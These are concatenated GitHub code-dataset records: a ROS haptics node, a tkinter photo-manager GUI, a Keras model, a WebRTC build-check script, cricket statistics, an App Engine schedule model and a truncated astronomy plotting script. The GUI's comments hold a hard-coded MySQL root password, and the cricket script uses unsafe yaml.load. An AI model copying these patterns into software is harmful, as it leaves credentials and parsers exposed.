state_input\n\tstate_input[19] = msg.position[0]\n\tstate_input[26] = msg.velocity[0]\n\tstate_input[33] = msg.effort[0]\n\t\ndef cb_PSM1_jaw_d(msg):\n\tglobal state_input\n\tstate_input[40] = msg.position[0]\n\tstate_input[47] = msg.effort[0]\n\t\ndef cb_PSM1_wrench(msg):\n\tglobal state_input\n\tstate_input[48]=msg.wrench.force.x\n\tstate_input[49]=msg.wrench.force.y\n\tstate_input[50]=msg.wrench.force.z\n\tstate_input[51]=msg.wrench.torque.x\n\tstate_input[52]=msg.wrench.torque.y\n\tstate_input[53]=msg.wrench.torque.z\n\n# create rosnode\nrospy.init_node(\"haptic_feedback\")\n\n# create the state vector for input as a global variable\nglobal state_input\nstate_input = np.zeros((54,))\n\n# initialize the subscribers\nPSM1_pos_c = rospy.Subscriber('/dvrk/PSM2/position_cartesian_current',PoseStamped,cb_PSM1_pos_c)\nPSM1_pos_d = rospy.Subscriber('/dvrk/PSM2/position_cartesian_desired',PoseStamped,)\nPSM1_joint_c = rospy.Subscriber('/dvrk/PSM2/state_joint_current',JointState,cb_PSM1_joint_c)\n#PSM1_joint_d = rospy.Subscriber('/dvrk/PSM2/state_joint_desired',JointState,cb_PSM1_joint_d)\nPSM1_jaw_c = rospy.Subscriber('/dvrk/PSM2/state_jaw_current',JointState,cb_PSM1_jaw_c)\nPSM1_jaw_d = rospy.Subscriber('/dvrk/PSM2/state_jaw_desired',JointState,cb_PSM1_jaw_d)\nPSM1_twist = rospy.Subscriber('/dvrk/PSM2/twist_body_current',TwistStamped,cb_PSM1_twist)\nPSM1_wrench = rospy.Subscriber('/dvrk/PSM2/wrench_body_current',WrenchStamped,cb_PSM1_wrench)\n\nstate_publisher = rospy.Publisher('ml_state_input',Float64MultiArray,queue_size = 1)\nstate_multarray = Float64MultiArray()\n\nr = rospy.Rate(1000)\nwhile not rospy.is_shutdown():\n\tstate_multarray.data = list(state_input)\n\tstate_publisher.publish(state_multarray)\n\tr.sleep()\n","repo_name":"chuazh/visual_force_estimation","sub_path":"render_haptics_dvrk.py","file_name":"render_haptics_dvrk.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15836267925","text":"# SQLconnection = sql.checkConnection()\r\n\r\ndef addFolder():\r\n global input_folder\r\n\r\n # labelFolder = tk.Label(frame, text=input_folder)\r\n # labelFolder.pack()\r\n print(input_folder)\r\n\r\n\r\ndef display_title(string):\r\n label = tk.Label(subDisplay, text=string, font=(\"Helvetica\", 20), bg='white', justify=LEFT)\r\n label.grid(row=0, column=0)\r\n\r\n\r\ndef confirmSettings(labels, params, values):\r\n # todo mudar para verde se ok\r\n global SQLimported, sql\r\n global forceSettings\r\n for param, value in zip(params, values):\r\n value = value.get()\r\n if param in ['output_folder', 'duplicate_folder']:\r\n if not config.get_USERconfig(param) == value:\r\n if checks.check_folder(param):\r\n fh.move_folder(config.get_USERconfig(param), value)\r\n # falta mover no check_folder se existir items. se for output, atualizar DB !!!!\r\n\r\n config.changeConfig('user', param, value)\r\n\r\n # proceder com as definicoes\r\n if param in ['user', 'passwd', 'host', 'port', 'db_name']:\r\n if not config.get_SQLconfig(param) == value:\r\n config.changeConfig('sql', param, value)\r\n # testar ligacao e se ok mudar settings\r\n\r\n if param == 'db_name': # ultimo elemento a ser verificado, testar conexao\r\n\r\n # ver isto ! importar so se ainda nao se tiver importado\r\n if SQLimported:\r\n forceSettings = not (sql.checkConnection())\r\n else:\r\n try:\r\n import myfunc_mysql as sql\r\n SQLimported = True\r\n forceSettings = False\r\n except:\r\n forceSettings = True\r\n if forceSettings:\r\n labels[2].config(text='mySQL: ERROR', fg=\"red\")\r\n else:\r\n labels[2].config(text='mySQL: OK', fg='green')\r\n face.close_thread = False\r\n\r\ndef fillpathButton(entry):\r\n # create button with ...\r\n path = filedialog.askdirectory(title='Selecionar Pasta')\r\n print('path')\r\n entry.delete(0, END)\r\n entry.insert(0, path)\r\n # file to open default\r\n # where to put info\r\n # return buttontype\r\n\r\n\r\ndef ba_addFiles(entry, label1, label2):\r\n label1.config(text='Estado : A adicionar ficheiros')\r\n resp = fh.add_newfiles(entry)\r\n label1.config(text='Estado : Ficheiros Adicionados')\r\n label2.config(text=resp)\r\n\r\ndef showDisplay(type):\r\n global subDisplay\r\n subDisplay.destroy()\r\n subDisplay = tk.Frame(frameDisplay, bg='white')\r\n subDisplay.place(relwidth=0.8, relheight=0.8, relx=0.1, rely=0.1)\r\n if type == 'photo':\r\n display_title('Adicionar Fotografias')\r\n label = tk.Label(subDisplay, text='Selecionar Pasta com as fotografias :', font=(\"Helvetica\", 12), bg='white',\r\n justify=LEFT)\r\n label.grid(row=1, column=0)\r\n entryFolder = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black', width=100)\r\n entryFolder.grid(row=2, column=0)\r\n button3dot = tk.Button(subDisplay, text=\"...\", padx=5, pady=1, command=lambda: fillpathButton(entryFolder))\r\n button3dot.grid(row=2, column=1)\r\n label_status = tk.Label(subDisplay, text='Estado :', font=(\"Helvetica\", 12), bg='white', justify=LEFT)\r\n label_status.grid(row=4, column=0)\r\n label_results = tk.Label(subDisplay, text='', font=(\"Helvetica\", 12), bg='white', justify=LEFT)\r\n label_results.grid(row=5, column=0)\r\n button_add = tk.Button(subDisplay, text=\"Adicionar Fotos\", padx=20, pady=6,\r\n command=lambda: ba_addFiles(entryFolder.get(), label_status, label_results))\r\n button_add.grid(row=3, column=0)\r\n\r\n if type == 'person':\r\n display_title('Adicionar Pessoa')\r\n\r\n\r\n try:\r\n hash_id, face_xy, encode = sql.getUnknownFace()\r\n if fh.hashes == 'notloaded':\r\n fh.hashes = sql.loadHashes()\r\n face.close_thread = False\r\n img = PIL.ImageTk.PhotoImage(Image.open(fh.hashes.loc[fh.hashes['hash_id'] == hash_id]['file_location'].item()))\r\n panel = tk.Label(subDisplay, image=img)\r\n panel.grid(row=1, column=0)\r\n except:\r\n label = tk.Label(subDisplay, text='Não ha pessoas desconhecidas para apresentar', font=(\"Helvetica\", 12),\r\n bg='white', justify=LEFT)\r\n label.grid(row=1, column=0)\r\n if type == 'event':\r\n display_title('Adicionar Evento')\r\n\r\n if type == 'search':\r\n display_title('Pesquisa')\r\n\r\n if type == 'settings':\r\n param = ['output_folder', 'duplicate_folder', 'user', 'passwd', 'host', 'port', 'db_name']\r\n values = []\r\n labels = []\r\n display_title('Definições')\r\n # Def Utilizador\r\n label = tk.Label(subDisplay, text='Utilizador', font=(\"Helvetica\", 12), bg='white', justify=LEFT)\r\n label.grid(row=1, column=0)\r\n\r\n dvalue = config.get_USERconfig('output_folder')\r\n label = tk.Label(subDisplay, text='Localizacao :', font=(\"Helvetica\", 8), bg='white')\r\n label.grid(row=2, column=0)\r\n eu1 = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black', width=100)\r\n eu1.grid(row=2, column=1)\r\n eu1.insert(0, dvalue)\r\n labels.append(label)\r\n\r\n dvalue = config.get_USERconfig('duplicate_folder')\r\n label = tk.Label(subDisplay, text='Duplicados :', font=(\"Helvetica\", 8), bg='white')\r\n label.grid(row=3, column=0)\r\n eu2 = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black', width=100)\r\n eu2.grid(row=3, column=1)\r\n eu2.insert(0, dvalue)\r\n labels.append(label)\r\n\r\n # Def SQL\r\n label = tk.Label(subDisplay, text='mySQL', font=(\"Helvetica\", 12), bg='white', justify=LEFT)\r\n label.grid(row=4, column=0)\r\n labels.append(label)\r\n dvalue = config.get_SQLconfig('user')\r\n label = tk.Label(subDisplay, text='user :', font=(\"Helvetica\", 8), bg='white')\r\n label.grid(row=5, column=0)\r\n es1 = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black')\r\n es1.grid(row=5, column=1, sticky=W)\r\n es1.insert(0, dvalue)\r\n\r\n dvalue = config.get_SQLconfig('passwd')\r\n label = tk.Label(subDisplay, text='passwd :', font=(\"Helvetica\", 8), bg='white')\r\n label.grid(row=6, column=0)\r\n es2 = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black', show=\"*\")\r\n es2.grid(row=6, column=1, sticky=W)\r\n es2.insert(0, dvalue)\r\n\r\n dvalue = config.get_SQLconfig('host')\r\n label = tk.Label(subDisplay, text='host :', font=(\"Helvetica\", 8), bg='white')\r\n label.grid(row=7, column=0)\r\n es3 = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black')\r\n es3.grid(row=7, column=1, sticky=W)\r\n es3.insert(0, dvalue)\r\n\r\n dvalue = config.get_SQLconfig('port')\r\n label = tk.Label(subDisplay, text='port :', font=(\"Helvetica\", 8), bg='white')\r\n label.grid(row=8, column=0)\r\n es4 = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black')\r\n es4.grid(row=8, column=1, sticky=W)\r\n es4.insert(0, dvalue)\r\n\r\n dvalue = config.get_SQLconfig('db_name')\r\n label = tk.Label(subDisplay, text='db_name :', font=(\"Helvetica\", 8), bg='white')\r\n label.grid(row=9, column=0)\r\n es5 = tk.Entry(subDisplay, font=(\"Helvetica\", 8), bg='white', fg='black')\r\n es5.grid(row=9, column=1, sticky=W)\r\n es5.insert(0, dvalue)\r\n\r\n values.extend([eu1, eu2, es1, es2, es3, es4, es5])\r\n confirmButton = tk.Button(\r\n subDisplay, padx=60, pady=20, bg='grey', fg='white', text=\"Confirmar Definições\",\r\n command=lambda: confirmSettings(labels, param, values)\r\n )\r\n confirmButton.grid(row=10, column=1)\r\n '''\r\n config['user'] = {\r\n 'output_folder': r'.\\Output Folder',\r\n 'duplicate_folder': r'.\\Duplicate Folder'\r\n }\r\n config['sql'] = {\r\n 'user': 'root',\r\n 'passwd': 'themrxpro',\r\n 'host': 'localhost',\r\n 'port': '3306',\r\n 'db_name': 'sql_photos'\r\n }\r\n '''\r\ndef updateLabel(label):\r\n label.config(text=fh.Global_labelText)\r\n label.after(1000,lambda: updateLabel(label))\r\n\r\ndef createWindow():\r\n global frameMenu, frameDisplay, subDisplay\r\n\r\n # CREATES FRAME - MENU\r\n frameMenu = tk.Frame(root, bg='black')\r\n frameMenu.place(relwidth=0.3, relheight=1)\r\n subMenu = tk.Frame(frameMenu, bg='black')\r\n subMenu.place(relwidth=0.8, relheight=0.8, relx=0.1, rely=0.1)\r\n # CREATES FRAMES - DISPLAY\r\n frameDisplay = tk.Frame(root, bg='white')\r\n frameDisplay.place(relwidth=0.7, relx=0.3, relheight=1)\r\n subDisplay = tk.Frame(frameDisplay, bg='white')\r\n subDisplay.place(relwidth=0.8, relheight=0.8, relx=0.1, rely=0.1)\r\n\r\n face_status = tk.Label(frameDisplay, text='Starting', font=(\"Helvetica\", 12), bg='white', justify=LEFT)\r\n face_status.place(relx = 1.0,rely = 1.0, anchor='se')\r\n updateLabel(face_status)\r\n\r\n # MENU OPTIONS\r\n size_x = 120\r\n size_y = 40\r\n\r\n menu_addfoto = tk.Button(\r\n subMenu, padx=size_x, pady=size_y, bg='black', fg='white', text=\"Adicionar Fotografias\",\r\n command=lambda: showDisplay('photo'))\r\n menu_addperson = tk.Button(\r\n subMenu, padx=size_x, pady=size_y, bg='black', fg='white', text=\"Adicionar Pessoa\",\r\n command=lambda: showDisplay('person'))\r\n menu_addevent = tk.Button(\r\n subMenu, padx=size_x, pady=size_y, bg='black', fg='white', text=\"Adicionar Evento\",\r\n command=lambda: showDisplay('event'))\r\n menu_search = tk.Button(\r\n subMenu, padx=size_x, pady=size_y, bg='black', fg='white', text=\"Pesquisa\",\r\n command=lambda: showDisplay('search'))\r\n menu_settings = tk.Button(\r\n subMenu, padx=size_x, pady=size_y, bg='black', fg='white', text=\"Definições\",\r\n command=lambda: showDisplay('settings'))\r\n\r\n menu_addfoto.pack()\r\n menu_addperson.pack()\r\n menu_addevent.pack()\r\n menu_search.pack()\r\n menu_settings.pack()\r\n\r\n\r\nif __name__ == '__main__':\r\n # init\r\n import myfunc_config as config\r\n import os\r\n\r\n if not os.path.isfile(r'\\config.ini'): config.create_config()\r\n try:\r\n import myfunc_mysql as sql\r\n\r\n forceSettings = False\r\n SQLimported = True\r\n except ImportError:\r\n forceSettings = True\r\n SQLimported = False\r\n import tkinter as tk\r\n from tkinter import filedialog, Text\r\n from tkinter import BOTH, END, LEFT, W\r\n # import myfunc_mysql as sql\r\n import myfunc_checks as checks\r\n import myfunc_filehandler as fh\r\n import myfunc_face as face\r\n import threading\r\n import PIL\r\n #start thread here\r\n\r\n\r\n root = tk.Tk()\r\n input_folder = ''\r\n canvas = tk.Canvas(root, height=700, width=1200)\r\n canvas.pack()\r\n # todo block window size\r\n ### LEFT FRAME\r\n createWindow()\r\n showDisplay('settings')\r\n\r\n worker = threading.Thread(target=fh.face_Manager)\r\n worker.start()\r\n\r\n root.mainloop()\r\n #todo end_tread\r\n if fh.close_thread == None:\r\n worker.exit()\r\n else:\r\n fh.close_thread = True\r\n worker.join()\r\n\r\n","repo_name":"themrxpro/ISEP_Project","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":11377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14407802605","text":"from tensorflow import keras\n\nfrom util.partition_strategy import GraphPartitionStrategy\nfrom tf_src.agcn.layer import GraphConvolutionSequenceLayer\n\n\ndef create_model(config, graph, input_shape):\n strategy = GraphPartitionStrategy(config.strategy)\n adj = strategy.get_adjacency_matrix_array(graph)\n num_channels, num_frames, num_joints, num_bodies = input_shape\n\n model = keras.models.Sequential([\n # shape after transpose = (batch_size, num_bodies, num_joints, num_channels, num_frames)\n keras.layers.Permute((4, 3, 1, 2)),\n # Reshape to batch normalize over each batch and frame\n # Shape after reshape = (batch_size, num_bodies * num_joints * num_channels, num_frames)\n keras.layers.Reshape((-1, num_frames)),\n keras.layers.BatchNormalization(axis=1, epsilon=1e-5),\n # Reshape back\n keras.layers.Reshape((num_bodies, num_joints, num_channels, num_frames)),\n # shape after transpose = (batch_size, num_bodies, num_channels, num_frames, num_joints)\n keras.layers.Permute((1, 3, 4, 2)),\n\n GraphConvolutionSequenceLayer(config, adj),\n\n keras.layers.Dense(config.num_classes, kernel_regularizer=config.kernel_regularizer)\n ], \"AGCN\")\n\n return model\n","repo_name":"mduhme/fusion-gcn","sub_path":"tf_src/agcn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"12293301375","text":"import os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nSRC_DIR = os.path.normpath(os.path.join(SCRIPT_DIR, os.pardir, os.pardir))\nsys.path.append(os.path.join(SRC_DIR, 'build'))\nimport find_depot_tools\n\n\n# GN_ERROR_RE matches the summary of an error output by `gn check`.\n# Matches \"ERROR\" and following lines until it sees an empty line or a line\n# containing just underscores.\nGN_ERROR_RE = re.compile(r'^ERROR .+(?:\\n.*[^_\\n].*$)+', re.MULTILINE)\n\n\ndef RunGnCheck(root_dir=None):\n \"\"\"Runs `gn gen --check` with default args to detect mismatches between\n #includes and dependencies in the BUILD.gn files, as well as general build\n errors.\n\n Returns a list of error summary strings.\n \"\"\"\n out_dir = tempfile.mkdtemp('gn')\n try:\n command = [\n sys.executable,\n os.path.join(find_depot_tools.DEPOT_TOOLS_PATH, 'gn.py'),\n 'gen',\n '--check',\n out_dir,\n ]\n subprocess.check_output(command, cwd=root_dir)\n except subprocess.CalledProcessError as err:\n return GN_ERROR_RE.findall(err.output)\n else:\n return []\n finally:\n shutil.rmtree(out_dir, ignore_errors=True)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/webrtc/tools_webrtc/presubmit_checks_lib/gn_check.py","file_name":"gn_check.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"30879552230","text":"import yaml\n\ndef read_data():\n with open ('335982.yaml', 'r') as f:\n data = yaml.load(f)\n f.close()\n return data\n\ndata = read_data()\n\ndef import_teams(data):\n teams = data['info']['teams']\n return teams\n\nteams = import_teams(data)\nprint(teams)\n\nfirst_batsman = data['innings'][0]['1st innings']['deliveries'][0][0.1]['batsman']\nprint (\"The first batsman is: %s\" %(first_batsman))\n\ndef deliveries_count(data, batsman):\n count = 0\n deliveries = data['innings'][0]['1st innings']['deliveries']\n for delivery in deliveries:\n for delivery_number, delivery_info in delivery.items():\n if delivery_info['batsman'] == batsman:\n count += 1\n return count\nRT = (deliveries_count(data, 'RT Ponting'))\nprint (\"The number of deliveries faced by RT Ponting are: \" + str(RT))\n\ndef runs(data, batsman):\n score = 0\n deliveries = data['innings'][0]['1st innings']['deliveries']\n for delivery in deliveries:\n for delivery_number, delivery_info in delivery.items():\n if delivery_info['batsman'] == batsman:\n score += delivery_info['runs']['batsman']\n return score\n\nBB = runs(data,'BB McCullum')\nprint (\"The amount of runs scored by BB McCullum are: \" + str(BB))\n\ndef bowled_out(data):\n bowled_players = []\n deliveries = data['innings'][1]['2nd innings']['deliveries']\n for delivery in deliveries:\n for delivery_number, delivery_info in delivery.items():\n if 'wicket' in delivery_info and delivery_info['wicket']['kind'] == 'bowled':\n bowled_players.append(delivery_info['wicket']['player_out'])\n\n return bowled_players\nBP = bowled_out(data)\nprint (\"The players that were out bowled in the second innings are: \")\nfor i in range(0, len(BP)):\n print (\".\" + BP[i]),\n\ndef extras_runs(data):\n innings1_extras = 0\n deliveries = data['innings'][0]['1st innings']['deliveries']\n for delivery in deliveries:\n for delivery_number, delivery_info in delivery.items():\n innings1_extras += delivery_info['runs']['extras']\n innings2_extras = 0\n deliveries = data['innings'][1]['2nd innings']['deliveries']\n for delivery in deliveries:\n for delivery_number, delivery_info in delivery.items():\n innings2_extras += delivery_info['runs']['extras']\n difference = abs(innings1_extras - innings2_extras)\n return difference\n\nEXT = extras_runs(data)\nprint(\"The difference in extras between the two innings was: \" + str(EXT) + \" runs\")\n","repo_name":"Umang81/Python-and-ML-Assignments","sub_path":"ipl/ass1.py","file_name":"ass1.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17239097719","text":"# coding=utf-8\nfrom google.appengine.ext import ndb\n\n__author__ = 'dvpermyakov'\n\n\nclass ScheduleItem(ndb.Model):\n start = ndb.TimeProperty(required=True)\n end = ndb.TimeProperty(required=True)\n\n def start_str(self):\n from methods.rendering import STR_TIME_FORMAT\n return self.start.strftime(STR_TIME_FORMAT)\n\n def end_str(self):\n from methods.rendering import STR_TIME_FORMAT\n return self.end.strftime(STR_TIME_FORMAT)\n\n def get_valid_time_str(self):\n return u'Заказы в этот день доступны c %s до %s.' % (self.start_str(), self.end_str())\n\n def get_restriction_time_str(self, what):\n return u'Заказы %s доступны c %s до %s.' % (what, self.start_str(), self.end_str())\n\n def get_time_break_str(self):\n return u'Перерыв c %s до %s.' % (self.start_str(), self.end_str())\n\n\nclass DaySchedule(ScheduleItem):\n DAYS = (1, 2, 3, 4, 5, 6, 7)\n DAY_MAP = {\n 1: u'Понедельник',\n 2: u'Вторник',\n 3: u'Среда',\n 4: u'Четверг',\n 5: u'Пятница',\n 6: u'Суббота',\n 7: u'Воскресенье'\n }\n DAY_SHORT_MAP = {\n 1: u'Пн',\n 2: u'Вт',\n 3: u'Ср',\n 4: u'Чт',\n 5: u'Пт',\n 6: u'Сб',\n 7: u'Вс'\n }\n\n weekday = ndb.IntegerProperty(required=True, choices=DAYS)\n\n def compare(self, day, weekday_include=False):\n result = self.start == day.start and self.end == day.end\n if weekday_include:\n result = result and self.weekday == day.weekday\n return result\n\n def interval_str(self, day):\n hours_interval_str = '%s-%s' % (self.start_str(), self.end_str())\n if self.compare(day, weekday_include=True):\n return '%s: %s' % (self.DAY_SHORT_MAP[self.weekday], hours_interval_str)\n else:\n return '%s-%s: %s' % (self.DAY_SHORT_MAP[self.weekday], day.DAY_SHORT_MAP[day.weekday], hours_interval_str)\n\n def short_str(self):\n return u'%s, %s - %s' % (self.DAY_SHORT_MAP[self.weekday], self.start_str(), self.end_str())\n\n def str(self):\n return u'%s, %s - %s' % (self.DAY_MAP[self.weekday], self.start_str(), self.end_str())\n\n\nclass DateSchedule(ScheduleItem):\n date = ndb.DateProperty(required=True)\n closed = ndb.BooleanProperty(required=True)\n\n\nclass Schedule(ndb.Model):\n days = ndb.LocalStructuredProperty(DaySchedule, repeated=True)\n overrides = ndb.LocalStructuredProperty(DateSchedule, repeated=True)\n\n def get_days(self, start, end):\n days = []\n for day in self.days:\n if day.start == start and day.end == end:\n days.append(day)\n return days\n\n def get_day(self, weekday):\n for day in self.days:\n if day.weekday == weekday:\n return day\n\n def get_item_for_date(self, date):\n for override in self.overrides:\n if override.date == date:\n if override.closed:\n return None\n return override\n return self.get_day(date.isoweekday())\n\n def get_days_str(self):\n def add_interval(result):\n if result:\n result += ', '\n result += start_day.interval_str(current_day)\n return result\n\n result = ''\n if not self.days:\n return result\n start_day = self.days[0]\n current_day = None\n for day in self.days:\n if not start_day.compare(day):\n result = add_interval(result)\n start_day = day\n current_day = day\n result = add_interval(result)\n return result\n\n def dict(self):\n days_in_result = []\n result = []\n for day in self.days:\n if day not in days_in_result:\n days = self.get_days(day.start, day.end)\n days_in_result.extend(days)\n result.append({\n 'days': [day.weekday for day in days],\n 'hours': '%s-%s' % (day.start.hour, day.end.hour),\n 'minutes': '%s-%s' % (day.start.minute, day.end.minute)\n })\n return result\n","repo_name":"lopatinsky/automation-gae","sub_path":"models/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6777496634","text":"#!/usr/bin/env python\n\nimport emcee\nimport scipy.optimize as op\nimport corner\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom nkrpy.constants import c, msun\nfrom IPython import embed\nfrom nkrpy.coordinates import checkconv\nfrom astropy import units as u\nfrom astropy import constants as const\nfrom nkrpy.apo import fits\nimport Nice_Plots_2\nfrom matplotlib.ticker import FormatStrFormatter\nfrom nkrpy.decorators import deprecated\n\nfilein = 'PV-Diagram_L1448IRS3B_C17O_image_taper1500k.image.txt'\nFile = '../L1448IRS3B_C17O_image_taper1500k.image.fits'\ntitle = r'L1448IRS3B C$^{17}$O'\nra_orig = '03 25 36.329'\ndec_orig = '30 45 15.042'\nrotation_deg = -62 #degrees -62\nyerr = 0.05\ndis_err = 10\nv_err = 0.11\nimagemin = -0.5\nimagemax = 3\nv_width = 10\narcsec_width = 10\nv_source = 4.8\noffset = 0\ncontour_interval = 3\ncontour_min = 10\ncontour_max = 24\nmass = 1.1\nmass_err = 0\nd_source = 288.\ninclination = 45.\nplot_num_fit = True\nplot_eye_fit = False\nplot_orbital = False\ncut = 12\nfit_pv = True\n\nra,dec=checkconv(ra_orig)*15.,checkconv(dec_orig)\nPV_Data = np.loadtxt(filein)\n\nprint('Everything loaded, now computing PV diagram')\n\nplt.ion()\nfig = plt.figure(figsize=(10,10))\nNice_Plots_2.set_style()\nax = fig.add_subplot(111)\ncax = ax.imshow(PV_Data, origin = 'lower', cmap = 'magma',vmin=imagemin,vmax=imagemax,interpolation='nearest')\nax.set_title(title)\nax.set_xlabel('Velocity (km s$^{-1}$)')\nax.set_ylabel('Offset ($^{\\prime\\prime}$)')#'Position [arcsec]')$\\Delta$X\n\n#Getting the data.\nheader, data = fits.read(File)\n#The datacubes coming from the thindisk model have 3 dimensions, \n#while the science datacubes have 4 dimension. So we have to account\n#for that. \nif len(np.shape(data)) == 4:\n Data = data[0,:,:,:]\nelse:\n Data = data\n\n#Determining the shape of the data.\n\nShape_Data = Data.shape\n\n\nN = header['NAXIS3']\nif header['CTYPE3'] == 'VELO-LSR':\n print('True')\n begin_v = header['LSTART']\n delta_v = header['LWIDTH']\nelif header['CTYPE3'] == 'FREQ':\n #Reading the data in frequencies. We have to bring this to velocities. \n begin_freq = header['CRVAL3']\n delta_freq = header['CDELT3']\n begin_pos = header['CRPIX3'] - 1\n rest_freq = header['RESTFRQ']\n #The speed of light is.\n c = c/100/1000.#km s^-1\n #Calculating the begin velocity.\n begin_v = c * (np.square(rest_freq) - np.square(begin_freq - delta_freq*begin_pos)) / ( np.square(rest_freq) + np.square(begin_freq - delta_freq*begin_pos))\n #Now we calculate the delta v\n begin_v_plus_one = c * (np.square(rest_freq) - np.square(begin_freq - delta_freq*(begin_pos + 1))) / ( np.square(rest_freq) + np.square(begin_freq - delta_freq*(begin_pos + 1)))\n delta_v = np.round(begin_v - begin_v_plus_one, 2)\n delta_v =begin_v - begin_v_plus_one\n\nPixelWidth_RA = header['CDELT1']\nPixelWidth_DEC = header['CDELT2']\n\nrotation_rad = np.radians(rotation_deg)\ny_size = np.round(np.abs(np.cos(np.abs(rotation_rad))*Shape_Data[1]) + np.abs(np.cos(np.pi/2 - np.abs(rotation_rad))*Shape_Data[2]))\n\nlength_arcsec_new = (np.abs(np.cos(np.abs(rotation_rad)))*np.abs(PixelWidth_RA)*Shape_Data[2]+np.abs(np.cos(np.pi/2.0-np.abs(rotation_rad)))*np.abs(PixelWidth_DEC)*Shape_Data[1])*3600\n\n\nx_values = np.arange(begin_v, begin_v + delta_v*float(Shape_Data[0]), delta_v)\n\n#The total length in arcsec of the y axis in the new image.\nlength_arcsec_new = (np.abs(np.cos(np.abs(rotation_rad)))*np.abs(PixelWidth_RA)*Shape_Data[2]+np.abs(np.cos(np.pi/2.0-np.abs(rotation_rad)))*np.abs(PixelWidth_DEC)*Shape_Data[1])*3600\ny_values = np.arange(-length_arcsec_new/2.0, length_arcsec_new/2.0 + length_arcsec_new/10.0, length_arcsec_new/10.0)\n\n#Calculating the size of y pixel in the y direction in arcsec.\npixel_size_y_arcsec = length_arcsec_new/y_size\n\ny_arcsec = np.arange(1, PV_Data.shape[0])*pixel_size_y_arcsec - length_arcsec_new/2.0\n\npix_v_source = float(np.abs((begin_v - v_source)/delta_v))\n#Then we determine what half the width of the v slice must be.\npix_v_shift = float(v_width/delta_v/2.0)\n#print(pix_v_source, pix_v_shift,v_width,delta_v\n#Now we determine the central pixel for the arcsec.\npix_arcsec_central = float(y_size/2.0) - 1.0 + float(offset)\npix_arcsec_shift = float(arcsec_width/pixel_size_y_arcsec/2.0)\n\nstart = pix_v_source - pix_v_shift\nend = pix_v_source + pix_v_shift\nnum = 11.\nstep = (end - start)/num\nx = np.arange(start, end + step, step)[:int(num+1)]\nstart = pix_arcsec_central - pix_arcsec_shift\nend = pix_arcsec_central + pix_arcsec_shift\nnum = 11.\nstep = (end - start)/num\ny = np.arange(start, end+step, step)\n\nx = np.arange(pix_v_source - pix_v_shift, \\\n pix_v_source + pix_v_shift + 2.0*pix_v_shift/10.0, \\\n 2.0*pix_v_shift/10.0)\n#y = np.arange(pix_arcsec_central - pix_arcsec_shift, pix_arcsec_central + pix_arcsec_shift + 2*pix_arcsec_shift/10., 2*pix_arcsec_shift/10)\ny = np.linspace(pix_arcsec_central - pix_arcsec_shift,\\\n pix_arcsec_central + pix_arcsec_shift, 11.0)\n\n\nx_label = np.round(begin_v + delta_v*x, 1)\n#y_label = np.round((y+1)*pixel_size_y_arcsec - length_arcsec_new/2., 2) + 0.01\ny_label = np.linspace(-arcsec_width/2.0, arcsec_width/2.0, 11.0)\n\n\n#ax.yaxis.set_major_formatter(FormatStrFormatter(\"%.1f\"))\ny_label = np.array([\"%.1f\" % i for i in y_label])\nax.set_xticks(x)\nax.set_yticks(y)\nax.set_xticklabels(x_label)\nax.set_yticklabels(y_label)\n#Doing the zooming by limiting the shown x and y coordinates.\n#move after the labels, because those functions automatically adjust x and y limits.\n#print(pix_v_source - pix_v_shift, pix_v_source + pix_v_shift,pix_v_source\n#print('help!'\nax.set_xlim([pix_v_source - pix_v_shift, pix_v_source + pix_v_shift])\nprint([pix_v_source - pix_v_shift, pix_v_source + pix_v_shift])\nprint([pix_arcsec_central - pix_arcsec_shift, pix_arcsec_central + pix_arcsec_shift])\nax.set_ylim(pix_arcsec_central - pix_arcsec_shift, pix_arcsec_central + pix_arcsec_shift) \nax.set_aspect(1.0*pix_v_shift/pix_arcsec_shift)\n\n\n#Creating an array containing the velocities in km s^-1. \nvelocities = (np.arange(begin_v, begin_v + delta_v*float(Shape_Data[0]), delta_v) - v_source)\n#If we have correct masses we can calculate the velocity curve.\nprint('Including the velocities curves.')\n#Calculating the extreme masses within the errors, do we can also plot\n#those. \n\n#This function returns for a given mass (solar masses), velocity (in\n#km s^-1) and distance to the source (in pc) the radius (in arcsec) \n#assuming Keplerian rotation.\ndef Keplerian_Rotation(mass, velocity, Distance, inclination):\n radii_return = np.sin(inclination*np.pi/180.)**2*const.G.value*mass*const.M_sun.value/(velocity*1000)/(velocity*1000)/(Distance*u.pc.to(u.m))*u.rad.to(u.arcsec) \n #All the positive radii.\n radii_positive = radii_return[velocity < 0]\n #We also have some negative radii, so thats why we have to do this.\n radii_negative = -1*radii_return[velocity > 0] \n return radii_positive, radii_negative\n\n#Plotting the velocities\nif plot_eye_fit:\n mass_min_err = mass - mass_err\n mass_plus_err = mass + mass_err\n\n #print(velocities)\n\n #Calculate the radii.\n radii_positive, radii_negative = Keplerian_Rotation(mass, velocities, d_source, inclination)\n radii_positive_min_err, radii_negative_min_err = Keplerian_Rotation(mass_min_err, velocities, d_source, inclination)\n radii_positive_plus_err, radii_negative_plus_err = 